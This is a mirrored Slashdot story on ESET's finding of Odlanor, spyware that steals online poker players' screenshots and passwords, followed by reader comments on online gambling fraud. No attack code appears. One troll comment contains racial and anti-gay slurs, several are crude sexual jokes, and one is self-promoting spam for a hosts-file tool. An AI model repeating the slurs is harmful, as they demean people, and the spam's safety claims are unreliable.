Slashdot Mirror

← Back to Stories (view on slashdot.org)

What's In Your Hand? This Malware Knows

Posted by timothy on from the know-when-to-pull-the-plug-know-when-to-scan dept.

An anonymous reader writes with the story that ESET researchers have uncovered spyware targeting online poker players, called Odlanor, which works by sending screenshots of a player's game (along with that player's in-game identity) to the attacker; the attacker can then search for the player with that ID, and enjoy an unfair advantage. (Also at The Inquirer.) From the ESET report: In newer versions of the malware, general-purpose data-stealing functionality was added by running a version of NirSoft WebBrowserPassView, embedded in the Oldanor trojan. This tool, detected by ESET as Win32/PSWTool.WebBrowserPassView.B, is a legitimate, albeit potentially unsafe application, capable of extracting passwords from various web browsers. ... The trojan communicates with its C&C, the address of which is hardcoded in the binary, via HTTP. Part of the exfiltrated information, such as the malware version and information identifying the computer, are sent in the URL parameters. The rest of the collected information, including an archive with any screenshots or stolen passwords, is sent in the POST request data.

68 comments

  1. Another elitist software author by Anonymous Coward · · Score: 0

    Why do these arrogant pricks never consider cross-platform capability? I demand malware that works on free operating systems!

  2. Sounds like an opportuntity to fleece the scammers by jandrese · · Score: 4, Insightful

    Unencrypted HTTP back channel? I would be tempted to leave this running and wait for someone to try to use it, then at a crucial times (on a big bet) change what is being sent back to them to make my hand look weaker than it is. Then you tell your AV to nuke it and change your passwords.

    --

    I read the internet for the articles.
  3. Re: Sounds like an opportuntity to fleece the scam by Anonymous Coward · · Score: 0

    You beat me to it. Yep. I predict this will fail big time. If I had mod points and bothered to login I'd up vote as insightful.

  4. Simple solution by Anonymous Coward · · Score: 0

    Here's a simple solution: Don't play poker online.

    1. Re:Simple solution by JustAnotherOldGuy · · Score: 2

      Here's a simple solution: Don't play poker online.

      Seriously, I've never understood why ANYONE would trust online gambling. You have no idea what's on the other end, it just seems like the most idiotic way to lose your money imaginable. Just how gullible and trusting do you have to be to gamble online??

      At least at a real casino you can SEE the cards and chips and whatnot, but online? Why not just flush your money down the toilet and cut out the middle-man?

      --
      Just cruising through this digital world at 33 1/3 rpm...
    2. Re:Simple solution by nospam007 · · Score: 1

      "Seriously, I've never understood why ANYONE would trust online gambling. You have no idea what's on the other end,.."

      Usually 3-4 college kids who are sitting side by side, seeing each other's hand and fleecing the one or 2 morons at their table.

    3. Re:Simple solution by Anonymous Coward · · Score: 0

      Online gambling is actually a pretty tightly regulated industry -- at least in first world countries. Source code is audited by independent third parties, checksummed, and randomly audited to verify the operator has only approved code running on their production servers.

      As long as you're dealing with a properly licensed casino for your locality, you have no reason to believe that your chances are any different from a land-based casino. Which, by the way, the house always wins in either case. :)

      Disclosure: I write online casino software.

    4. Re:Simple solution by MyAlternateID · · Score: 1

      Here's a simple solution: Don't play poker online.

      Seriously, I've never understood why ANYONE would trust online gambling. You have no idea what's on the other end, it just seems like the most idiotic way to lose your money imaginable. Just how gullible and trusting do you have to be to gamble online??

      At least at a real casino you can SEE the cards and chips and whatnot, but online? Why not just flush your money down the toilet and cut out the middle-man?

      Won't somebody think of the poor middlemen?

    5. Re:Simple solution by sexconker · · Score: 0

      Your software can't prevent players from colluding with each other to cheat.

    6. Re:Simple solution by MagickalMyst · · Score: 1

      "I've never understood why ANYONE would trust online gambling."

      I used to work in the industry and it is as crooked as a $3 bill.

      --
      Political correctness is really just herd psychology pushed by insecure people who desperately seek social conformity.
    7. Re:Simple solution by Anonymous Coward · · Score: 0

      Indeed. (Same AC as above here.)

      I'll admit that I'm not knowledgeable of all types of gambling games. But the ones I've worked on have not had the angle where collusion between two or more parties in a game could result in reduced odds for non-colluding players. We run many simulations to ensure that we have a full understanding of all probabilities involved. (And if the math model doesn't match the empirical data, we know there's a bug somewhere. This actually happened once when there was a type-o in the spec that a game was implemented off of. It was caught.)

    8. Re:Simple solution by Bookworm09 · · Score: 1

      What kinds of things did you see/hear about?

    9. Re:Simple solution by Anonymous Coward · · Score: 0

      Biggest cheating scandal was Ultimate Bet. The owners of the site used a special poker client software that showed them their opponents cards to cheat players of their site out of an eight figure dollar amount.

      And then there of course was black friday DOJ claimed that the 3 biggest online sites were committing bank fraud and money laundering. Some people went to prison, fines paid exceeded 1 billion $, some cases are still ongoing, and online poker in the US has been basically dead since then.

      If you follow the twoplustwo poker forums you can find a new smaller cheating scandal every other week.

    10. Re:Simple solution by MagickalMyst · · Score: 1

      "What kinds of things did you see/hear about?"

      Illegal gaming servers; fraud; deceptive marketing practices; intimidation; threats of violence and blackmail; etc.

      The industry is run by rich, crooked money-grubbers who only care about making more money - at the expense of everyone else.

      I wish online gambling was just a business like any other (that's what they tell you in the industry), but the truth is that it is rotten to the core. On the positive side, I did learn a lot working for the casinos - about business, marketing and of course IT.

      --
      Political correctness is really just herd psychology pushed by insecure people who desperately seek social conformity.
  5. Great news by frovingslosh · · Score: 2

    This is great news. I hated only being cheated by the site operators.

    --
    I'm an American. I love this country and the freedoms that we used to have.
    1. Re:Great news by Anonymous Coward · · Score: 0

      I'm actually kinda surprised no one has made "blockchain poker" yet

  6. Re:Adolph Hitroll here with a Greasy Yoda up GNAA by Ginger+Unicorn · · Score: 0

    You seemed to have posted this several times today. I don't get it - what response are you hoping for? If it's mild confusion and wondering what it is that might motivate someone to devote a lot of time to doing this then I suppose I'm guilty of feeding the trolls.

    --
    (1.21 gigawatts) / (88 miles per hour) = 30 757 874 newtons
  7. Enjoy an unfair advantage? by DougOtto · · Score: 1

    Duh. Is there ever a situation where you wouldn't enjoy an unfair advantage?

    --
    Solving Unix problems since 1989...
  8. Re:Sounds like an opportuntity to fleece the scamm by FredGauss · · Score: 1

    I would be tempted to leave this running and wait for someone to try to use it, then at a crucial times (on a big bet) change what is being sent back to them to make my hand look weaker than it is.

    This. or goatse.

  9. Bottom feeders by sysrammer · · Score: 2

    Even without this, it's way too easy to cheat online. From simple collusion between multiple players, to bottom-feeders that spend all their time collecting a few bucks playing several nickle-ante games at once, it all adds up.

    On the internet, there is no such thing as a friendly game of cards.

    --
    His ignorance covered the whole earth like a blanket, and there was hardly a hole in it anywhere. - Mark Twain
    1. Re:Bottom feeders by Frosty+Piss · · Score: 1

      to bottom-feeders that spend all their time collecting a few bucks playing several nickel-ante games at once

      How is that cheating?

      --
      If you want news from today, you have to come back tomorrow.
    2. Re:Bottom feeders by sysrammer · · Score: 1

      Ok, you got me. Not cheating. But on the same moral level as seal clubbers.

      --
      His ignorance covered the whole earth like a blanket, and there was hardly a hole in it anywhere. - Mark Twain
    3. Re:Bottom feeders by Frosty+Piss · · Score: 1

      I would say it's a good strategy to make money in a shark pool.

      --
      If you want news from today, you have to come back tomorrow.
  10. Where are the Slashdot editors? Meh... by __aaclcg7560 · · Score: 1

    What's In Your Hand? The Shadow Knows

    FTFY - Link below for the /. youngsters.

    https://en.wikipedia.org/wiki/The_Shadow

  11. Re:Sounds like an opportuntity to fleece the scamm by Anonymous Coward · · Score: 0

    "What's in your hand?" Your penis. That's where it always is. Let 'em see a pic of THAT.

  12. Deceptive headline by bigdavex · · Score: 4, Funny

    I assumed this was about porn.

    --
    -Dave
  13. Re:Adolph Hitroll here with a Greasy Yoda up GNAA by deKernel · · Score: 1

    Glad I am not the only one that was left scratching my head of sorts. I skimmed quickly and then thought to myself: what a waste of time.

  14. Do you understand how slashdot works? by frovingslosh · · Score: 0

    You're about to be modded down by on-line poker players who desperately want to believe that they are not being cheated and feel compelled to silence anyone who says otherwise.

    --
    I'm an American. I love this country and the freedoms that we used to have.
  15. Easy answer by Anonymous Coward · · Score: 1

    What's In Your Hand? Your dick. At least for 99% of slashdot users.

    1. Re:Easy answer by PopeRatzo · · Score: 1

      What's In Your Hand? Your dick. At least for 99% of slashdot users.

      Wrong. For 83% of Slashdot users, it's someone else's dick.

      --
      You are welcome on my lawn.
    2. Re:Easy answer by Anonymous Coward · · Score: 0

      You've obviously researched the matter. Voice of experience.

  16. You could have fun with this... by toonces33 · · Score: 1

    You could tweak the thing to intentionally send the wrong information to the people controlling the malware. They might think you have one hand and bet accordingly, when in fact you have something completely different. The problem is that they would figure out that something was wrong pretty quickly.

  17. Re:Adolph Hitroll here with a Greasy Yoda up GNAA by toonces33 · · Score: 1

    This nonsense has been posted for months. Usually it gets modded down to -1 pretty quickly so most people won't even see it, but someone out there chooses to waste their time posting this gunk.

  18. Re:Adolph Hitroll here with a Greasy Yoda up GNAA by Anonymous Coward · · Score: 0

    He doesn't necessary need a response. He is merely fulfilling the important role of keeping Slashdot's venerable troll tradition visible. While they might not be to your particular taste, greased-up yoda dolls and GNAA are a major part of the culture that Slashdot has built up over the years, a complex of shared references that bind this community together. Like many people whose Slashdot experience goes back to the turn of the millennium, I read this site as much for the troll lore as the tech news.

  19. Re:Sounds like an opportuntity to fleece the scamm by Anonymous Coward · · Score: 0

    "What's in your hand?" Your penis. That's where it always is. Let 'em see a pic of THAT.

    That depends. Does your camera have sufficiently high resolution?

  20. Really? by s.petry · · Score: 1

    I don't get it - what response are you hoping for?

    ANY! Don't feed the trolls!

    --

    -The wise argue that there are few absolutes, the fool argues that there are no probabilities.

  21. What's in my hand? by Anonymous Coward · · Score: 0

    I mean, sure, it knows. But it really wishes it didn't.

  22. Re:Sounds like an opportuntity to fleece the scamm by TheCarp · · Score: 1

    Um fuck no. If you go that route, you nuke the whole PC after.

    Anyway, depends how its implemented. If they are smart, it grabs your hole cards at the begining of the hand, before any real information exists for you to switch them on. If they do that, its going to be harder to pull this off.

    Better strategy is to just make your cards, as far as he sees them, random on each round, and visible to you....so you know what he thinks you have. Even better, you stack the table with friends and start out "playing straight" with him and let him win a little, then turn on the randomizers and fuck his world.

    --
    "I opened my eyes, and everything went dark again"
  23. Wait by hyperar · · Score: 1

    Is it "Odlanor" or "Oldanor"?

  24. The Confederate Navy wants you! by Anonymous Coward · · Score: 0

    The Confederate Navy wants you to know that this is a modern fleet. This is not your great-great-great-great-great-great-grandfather's navy. We welcome all. Gays, Niggers, Gayniggers, even chicks. You are all invited to join. Best of all, the most popular Confederate flag is actually a naval ensign, so you can fly it from your mast and be truly authentic. Come join today. It's simple. See a story that's just too PC or stupid, or just don't like it? Post a few lines, and then "You have been sunk by a Confederate submarine. BOOM! Glug, glug, glug.". That's all it takes and you're in. Don't be a racist though. You'll be keel-hauled, I swear. Trolling, not hate.

  25. "Odlanor" is "ronaldO" backward by Kevoco · · Score: 1

    just saying

    1. Re:"Odlanor" is "ronaldO" backward by GTRacer · · Score: 1

      Ever since the days of the old "Tobor" electronic robot toy, any time I see a seemingly-nonsense name, I reverse the letters. Not surprisingly, this resolves to something a fair amount of the time!

      --
      Defending IP by destroying access to it? That makes sense, RIAA/MPAA. Go to the corner until you can play nice!
    2. Re:"Odlanor" is "ronaldO" backward by sysrammer · · Score: 1

      "Tobor...The Eight Man" was the intro, or something like that. I was fairly young when I first saw that, and was might pleased when I figured out the puzzle. Saw it on UHF with the other Japanese cartoons. That, Speed Racer and Kimba.

      On a semi-related note, I thought the mouth moving with no voice, and visa versa, was funny. Many years later, went to Japan, and turned on a TV. There was a dubbed John Wayne movie. We laughed, then got bored. Their idea of a John Wayne voice did not appeal. So we turned down the volume and made our own dialogue. Good times. MST3k in the 70's!

      --
      His ignorance covered the whole earth like a blanket, and there was hardly a hole in it anywhere. - Mark Twain
  26. What's in my hand? LOL... by Anonymous Coward · · Score: 0

    My cock is in my hand right now... ok well currently as I type it's in my girlfriend's hand, and pretty soon it will be somewhere else, but whatever ;-)

  27. Re:Sounds like an opportuntity to fleece the scamm by Khashishi · · Score: 1

    Unencrypted HTTP back channel? I would be tempted to leave this running and wait for someone to try to use it, then at a crucial times (on a big bet) change what is being sent back to them to make my hand look weaker than it is. Then you tell your AV to nuke it and change your passwords.

    Damn, someone should make a movie of this. It's got everything.

  28. Between this, patching + security hardening by Anonymous Coward · · Score: 0

    See subject: I never GET malware @ all -> APK Hosts File Engine 9.0++ SR-2 32/64-bit http://start64.com/index.php?o...

    FREE & adds speed, security, + reliability, doing more with less, more efficiently vs. browser addons & locally installed DNS servers @ home + fixes DNS' redirect security issues - obtaining its data vs. online threats & adbanner blocking from 10 reputable sites in the security community - using something you already have vs. "bolting on browser addons 'MOAR' that's usermode slower & increases messagepassing, cpu + ram overuse overheads & actually SPEEDS YOU UP 2 ways (adblocking + locally cached in RAM favorites placed @ the TOP of hosts for fastest resolution speed), whereas by way of comparison, other "so-called security 'solutions'" SLOW YOU DOWN!

    * :)

    MalwareBytes' hpHosts Admin (MalwareBytes employee) hosts & recommends it -> http://hosts-file.net/?s=Downl... & MalwareBytes = BEST antivirus per this VERY recent testing of them all http://www.av-test.org/en/news...

    &

    It's GUARANTEED safe & clean per it being checked by 57 antivirus programs recently in BOTH its 64-bit model https://www.virustotal.com/en/...

    +

    In its 32-bit model also https://www.virustotal.com/en/...

    ---

    "The premise is quite simple: Take something designed by nature & reprogram it to make it work for the body rather than against it..." - Dr. Alice Krippen: "I am legend"...

    APK

    P.S.=> By "yours truly" - "The Lord of Hosts" so-to-speak:

    PERTINENT QUOTE/EXCERPT:

    "The image this title brings to mind is of a mighty military commander, one who can at a mere word summon rank upon rank of protective power" from https://answers.yahoo.com/ques... & THAT WORD = hosts!

    (Accept NO substitutes!)

    ...apk

  29. Re:Sounds like an opportuntity to fleece the scamm by climb_no_fear · · Score: 1

    Random? How does that work without tipping him/her off, since there's a reasonable chance that one of the cards you have in your random hand is already in his/her hand, right ?

  30. Re:Sounds like an opportuntity to fleece the scamm by Anonymous Coward · · Score: 0

    Won't work as the play is still stacked against you considerably.

    With the exploit working as expected: the scammer knows your hands perfectly while you know nothing. The scammer plays to eek out as much of your money as possible and (if smart) will win and lose a few so you feel you're having an "unlucky" day.

    With the exploit exploited as you suggest: the second the scammer sees that your cards were not what was expected he/she knows the game is up and leaves the game. Immediately. Of course the hand may get big, but the caps mean that the scammer will never really lose much. And, you then have an online adversary with a grudge and l33t skillz on your tail!

  31. Poker malware is sponsored by.... by Anonymous Coward · · Score: 0

    Golden Palace?

  32. Re:Sounds like an opportuntity to fleece the scamm by TheCarp · · Score: 1

    OTOH....

    He might assume that there is a flaw in his program or even that the poker company is on to him, and might waste hours trying to figure out what the problem is...and that could be some serious win.

    --
    "I opened my eyes, and everything went dark again"
  33. Anyone who gambles via the internet by mark_reh · · Score: 1

    is a moron and deserves to get sheared like the sheep he/she is.

    1. Re:Anyone who gambles via the internet by Anonymous Coward · · Score: 0

      You could say the same for offline gambling, too. Adding a computer doesn't make it any less of a losing game. :)

    2. Re:Anyone who gambles via the internet by frovingslosh · · Score: 1

      If you don't think that adding a computer (and the Internet) that the computer owner can control, see all of the cards in everyone's hand and all of the cards coming up, and even change the order of the cards coming up, or trade out his unexposed cards for ones coming up, then you really don't understand the game and the odds. And it is people who don't understand the game and the odds who should not be playing.

      --
      I'm an American. I love this country and the freedoms that we used to have.
  34. I wasn't doing anything! by wonkey_monkey · · Score: 1

    What's In Your Hand? This Malware Knows

    I was just scratching an itch!

    --
    systemd is Roko's Basilisk.
    1. Re:I wasn't doing anything! by Anonymous Coward · · Score: 0

      Yup, an itch in your nether regions. That required persistent, repeated scratching.

  35. Re:Adolph Hitroll here with a Greasy Yoda up GNAA by PIBM · · Score: 1

    Wow, I just have to reply .. I almost gave up scrolling since it was that long! Is that a randomly generated text or an experience with chimps typing ?

  36. Nope. by Anonymous Coward · · Score: 0

    It has no idea what I have in my hand.

  37. Re:Sounds like an opportuntity to fleece the scamm by Anonymous Coward · · Score: 0

    that sounds fun.

    too bad you will never know WHEN you are playing vs the scammer, as you will not know their handle.

  38. Re:Sounds like an opportuntity to fleece the scamm by jandrese · · Score: 1

    Yeah, once you change the cards once the scammer will know something is up. Once there is a discrepancy between the publicly available information and his back channel he will bail. You can fold a lot to reduce the amount of information you make public, but sooner or later you gotta show your hand.

    --

    I read the internet for the articles.
  39. Win32/PSWTool Malware .. by nickweller · · Score: 1

    I assume this Win32/PSWTool malware only works on Microsoft Windows ..

  40. Re: Adolph Hitroll here with a Greasy Yoda up GNAA by Anonymous Coward · · Score: 0

    Dude it's a bot. STFU it won't respond anyways.

  41. WTF by Anonymous Coward · · Score: 0

    A legitimate application they call it, and then say it steals passwords.
    So which is it? Once it makes that step to steal passwords the app is no longer legit.

    I guess they mean it doesn't try to hide? As in it shows up in task/resource manager? If that's all it takes to be a legit app then some versions of crypto locker and all those rogue A/V programs and many Trojans are legit too.

  42. But who knows... by Anonymous Coward · · Score: 0

    ... What evil lurks in the hearts of men? THE SHADOW KNOWS!

  43. Re: Adolph Hitroll here with a Greasy Yoda up GNAA by Ginger+Unicorn · · Score: 1

    Then it makes even less sense.

    --
    (1.21 gigawatts) / (88 miles per hour) = 30 757 874 newtons